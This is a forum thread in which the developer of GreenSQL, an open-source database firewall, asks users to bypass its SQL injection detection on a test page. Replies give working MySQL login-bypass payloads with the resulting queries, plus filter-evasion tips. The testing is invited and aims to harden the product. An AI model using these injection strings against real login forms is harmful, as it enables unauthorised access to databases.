Hi Guys!!!

I would like to ask all SQL gurus for help. I am running GreenSQL project. It is an open source database firewall. Some of the forum members had successfully cracked application logics in one of the first application versions. I want you to test new version.

We are going to release new production version soon and it is important to close all SQL Injection detection engine workarounds.

Here is the project website: [www.greensql.net]

SQL Injection test page (you need to break into this script): [www.greensql.net]

Demo version (it protects that sql-inection-test page): [demo.greensql.net]

More information regarding new version can be found here: [www.greensql.net]

Thanks,
Yuli



Edited 1 time(s). Last edit at 09/02/2008 03:01AM by yuli.

Quote:

I want you to test new version.

You might want to edit your post and change the above to "I would like to request your valued help in testing our new version." because the original 'request' sounded more like a demand.

--thrill

---

It is not the degrees you hold, but the mind you possess. - thrill

And now, even if he does edit his original post, thrill has provided us all with an unedited copy of this demand, so we all know how it was phrased before he took politeness classes...

heh.. yeah.. that was somewhat on purpose.. :)

--thrill

---

It is not the degrees you hold, but the mind you possess. - thrill

I hope it is much better now ;)

you seem to use MySQL, so I guess there are lots of these kinds:

username: \\
password: =(\' AND pwd=SHA(

query: SELECT * FROM user WHERE name = '\' AND pwd=SHA('=('\' AND pwd=SHA(')

Quote:

You had successfully bypassed GreenSQL protection.

Edited 1 time(s). Last edit at 09/02/2008 09:53AM by Reiners.

username: '='
password: ')=SHA('

query: SELECT * FROM user WHERE name = ''='' AND pwd=SHA('')=SHA('')

Quote:

You had successfully bypassed GreenSQL protection.

username: aa'in ('aa') or 1='1
password: ')=SHA('

its the same trick with the password, but it is not usual that you have to trick quotes AND brackets in one SQL injection. normally escaping the bracket is sufficient for SQLi.

have a look at the PHP-IDS thread, there are tons of vectors.

and you might find this article about mysql syntax useful to harden your filters (also check the 4 examples, I guess they'll work too). the problem is, that you can use as many comparisons, variables, constants, brackets, prefixes, whitespaces, mathematics (and so on) as you like and build complex "or 1=1" injections. also note, as the above vectors have shown that you dont need the "or" operator neccessarely since you can make direct comparisons:
select * from users where name='1'='1' and pass='1'='1'

what I dont like about your test page is, that it is
a) quoted query only (most vectors happen to be an integer (e.g. an ID) and no quotes are required)
b) only auth bypass
c) you need to break parenthesis and you normally dont need to. that breaks half of the vectors because you filter for comment types, but wont protect customers who use queries without parenthesis



Edited 3 time(s). Last edit at 12/19/2008 05:04AM by Reiners.